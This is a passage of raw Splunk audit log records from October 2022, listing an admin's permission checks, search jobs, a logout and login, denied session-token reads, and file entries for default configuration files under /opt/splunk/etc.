action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=list_health, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_health, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_global_banner, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=list_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=fsh_manage, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_udp, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_tcp, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_splunktcp, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_scripted, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_token_http, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=restart_splunkd, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.513, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.511, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.511, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.511, user=admin, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.498, user=admin, action=embed_report, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.495, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.495, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.495, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.495, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.421, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.378, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.378, user=admin, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:44:36.378, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.350, user=admin, action=quota,search_id=1665078276.5, elapsed_ms=1, cache_size=1] Audit:[timestamp=10-06-2022 17:44:36.349, user=admin, action=search, info=granted , search_id='1665078276.5', search='| mcatalog values(metric_name) as metrics WHERE NOT metric_name="*_mrollup_*" AND ("index"="*" OR "index"="_*" ) | mvexpand metrics limit=20000', autojoin='1', buckets=0, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='', apiStartTime='Thu Oct 6 17:29:36 2022', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 17:44:36.347, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:44:36.239, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.239, user=admin, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:44:36.239, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:44:36.022, user=admin, action=edit_user, info=granted object="admin" operation=edit] Audit:[timestamp=10-06-2022 17:44:36.022, user=admin, action=edit_user, info=granted object="admin" operation=list] Audit:[timestamp=10-06-2022 17:44:27.419, user=admin, action=embed_report, info=granted ] Audit:[timestamp=10-06-2022 17:44:27.418, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:44:27.418, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:44:27.418, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:44:27.418, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:44:27.418, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 17:44:27.418, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 17:44:27.262, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:44:27.262, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:44:27.261, user=admin, action=search, info=granted REST: /search/jobs/1665078120.4] Audit:[timestamp=10-06-2022 17:44:21.884, user=admin, action=search, info=granted REST: /search/timeparser/tz] Audit:[timestamp=10-06-2022 17:44:21.644, user=admin, action=rest_properties_get, info=granted REST: /properties/app] Audit:[timestamp=10-06-2022 17:44:14.471, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:44:04.490, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:43:54.474, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:43:44.465, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:43:44.332, user=admin, action=list_health, info=granted object="deployment" operation=list] Audit:[timestamp=10-06-2022 17:43:44.324, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:43:44.323, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:43:44.322, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:43:44.320, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:43:44.177, user=admin, action=edit_telemetry_settings, info=granted object="general" operation=list] Audit:[timestamp=10-06-2022 17:43:43.984, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.984, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.984, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.984, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.983, user=admin, action=edit_user, info=granted object="admin" operation=edit] Audit:[timestamp=10-06-2022 17:43:43.983, user=admin, action=edit_user, info=granted object="admin" operation=list] Audit:[timestamp=10-06-2022 17:43:43.983, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.983, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.983, user=admin, action=edit_telemetry_settings, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.983, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_workload_rules, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_tokens_all, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_sourcetypes, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_health, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_health, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_global_banner, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=fsh_manage, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.982, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_udp, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_tcp, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_splunktcp, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_scripted, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_token_http, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=restart_splunkd, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.981, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.979, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.979, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.979, user=admin, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:43:43.420, user=admin, action=search, info=granted REST: /search/timeparser/tz] Audit:[timestamp=10-06-2022 17:43:42.797, user=admin, action=edit_user, info=granted object="admin" operation=edit] Audit:[timestamp=10-06-2022 17:43:42.797, user=admin, action=edit_user, info=granted object="admin" operation=list] Audit:[timestamp=10-06-2022 17:43:42.788, user=n/a, action=read_session_token, info=denied, reason="non-locally generated token", session_user="user"] Audit:[timestamp=10-06-2022 17:43:42.501, user=admin, action=login attempt, info=succeeded reason=user-initiated useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" clientip=10.56.227.188" method=Splunk" session=d9da51d9bbcfe0b662ae5295a05ad394] Audit:[timestamp=10-06-2022 17:43:35.513, user=n/a, action=read_session_token, info=denied, reason="non-locally generated token", session_user="user"] Audit:[timestamp=10-06-2022 17:43:35.504, user=n/a, action=read_session_token, info=denied, reason="non-locally generated token", session_user="user"] Audit:[timestamp=10-06-2022 17:43:35.234, user=user, action=logout, info=succeeded reason=user-initiated useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" clientip=10.56.227.188 session=049c5d83adf94432d0ba08e524cbc70d] Audit:[timestamp=10-06-2022 17:43:09.268, user=n/a, action=add,path="/opt/splunk/etc/deployment-apps/README", isdir=0, size=307, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.265, user=n/a, action=add,path="/opt/splunk/etc/openldap/ldap.conf.default", isdir=0, size=1154, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.261, user=n/a, action=add,path="/opt/splunk/etc/openldap/ldap.conf", isdir=0, size=1154, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:03 2022", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.258, user=n/a, action=add,path="/opt/splunk/etc/system/default/data/ui/views/job_management.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.253, user=n/a, action=add,path="/opt/splunk/etc/system/default/data/ui/views/_admin.xml", isdir=0, size=415, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.250, user=n/a, action=add,path="/opt/splunk/etc/system/default/data/ui/views", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:09.246, user=n/a, action=add,path="/opt/splunk/etc/system/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:09.241, user=n/a, action=add,path="/opt/splunk/etc/system/default/workload_rules.conf", isdir=0, size=31, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.238, user=n/a, action=add,path="/opt/splunk/etc/system/default/workload_pools.conf", isdir=0, size=589, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.234, user=n/a, action=add,path="/opt/splunk/etc/system/default/workload_policy.conf", isdir=0, size=55, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.230, user=n/a, action=add,path="/opt/splunk/etc/system/default/workflow_actions.conf", isdir=0, size=488, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.226, user=n/a, action=add,path="/opt/splunk/etc/system/default/web.conf", isdir=0, size=56584, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.219, user=n/a, action=add,path="/opt/splunk/etc/system/default/visualizations.conf", isdir=0, size=12383, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.214, user=n/a, action=add,path="/opt/splunk/etc/system/default/viewstates.conf", isdir=0, size=188, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.209, user=n/a, action=add,path="/opt/splunk/etc/system/default/ui-tour.conf", isdir=0, size=12026, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.205, user=n/a, action=add,path="/opt/splunk/etc/system/default/ui-prefs.conf", isdir=0, size=2593, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.202, user=n/a, action=add,path="/opt/splunk/etc/system/default/transforms.conf", isdir=0, size=12861, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.198, user=n/a, action=add,path="/opt/splunk/etc/system/default/transactiontypes.conf", isdir=0, size=697, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.193, user=n/a, action=add,path="/opt/splunk/etc/system/default/times.conf", isdir=0, size=3496, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.190, user=n/a, action=add,path="/opt/splunk/etc/system/default/telemetry.conf", isdir=0, size=492, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.185, user=n/a, action=add,path="/opt/splunk/etc/system/default/sourcetypes.conf", isdir=0, size=416168, gid=41812, uid=41812, modtime="Sat May 1 18:45:12 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.181, user=n/a, action=add,path="/opt/splunk/etc/system/default/source-classifier.conf", isdir=0, size=38104, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.177, user=n/a, action=add,path="/opt/splunk/etc/system/default/serverclass.conf", isdir=0, size=1324, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.172, user=n/a, action=add,path="/opt/splunk/etc/system/default/server.conf", isdir=0, size=23587, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.169, user=n/a, action=add,path="/opt/splunk/etc/system/default/segmenters.conf", isdir=0, size=1759, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.163, user=n/a, action=add,path="/opt/splunk/etc/system/default/searchbnf.conf", isdir=0, size=382388, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.159, user=n/a, action=add,path="/opt/splunk/etc/system/default/savedsearches.conf", isdir=0, size=10257, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.155, user=n/a, action=add,path="/opt/splunk/etc/system/default/restmap.conf", isdir=0, size=75320, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.149, user=n/a, action=add,path="/opt/splunk/etc/system/default/props.conf", isdir=0, size=32557, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.145, user=n/a, action=add,path="/opt/splunk/etc/system/default/procmon-filters.conf", isdir=0, size=854, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.141, user=n/a, action=add,path="/opt/splunk/etc/system/default/outputs.conf", isdir=0, size=2165, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.137, user=n/a, action=add,path="/opt/splunk/etc/system/default/multikv.conf", isdir=0, size=317, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.133, user=n/a, action=add,path="/opt/splunk/etc/system/default/metric_rollups.conf", isdir=0, size=208, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.130, user=n/a, action=add,path="/opt/splunk/etc/system/default/metric_alerts.conf", isdir=0, size=996, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.126, user=n/a, action=add,path="/opt/splunk/etc/system/default/messages.conf", isdir=0, size=252512, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.121, user=n/a, action=add,path="/opt/splunk/etc/system/default/livetail.conf", isdir=0, size=298514, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.118, user=n/a, action=add,path="/opt/splunk/etc/system/default/literals.conf", isdir=0, size=207, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.114, user=n/a, action=add,path="/opt/splunk/etc/system/default/limits.conf", isdir=0, size=46734, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.110, user=n/a, action=add,path="/opt/splunk/etc/system/default/inputs.conf", isdir=0, size=3302, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.106, user=n/a, action=add,path="/opt/splunk/etc/system/default/indexes.conf", isdir=0, size=9602, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.101, user=n/a, action=add,path="/opt/splunk/etc/system/default/health.conf", isdir=0, size=20779, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.098, user=n/a, action=add,path="/opt/splunk/etc/system/default/global-banner.conf", isdir=0, size=247, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] 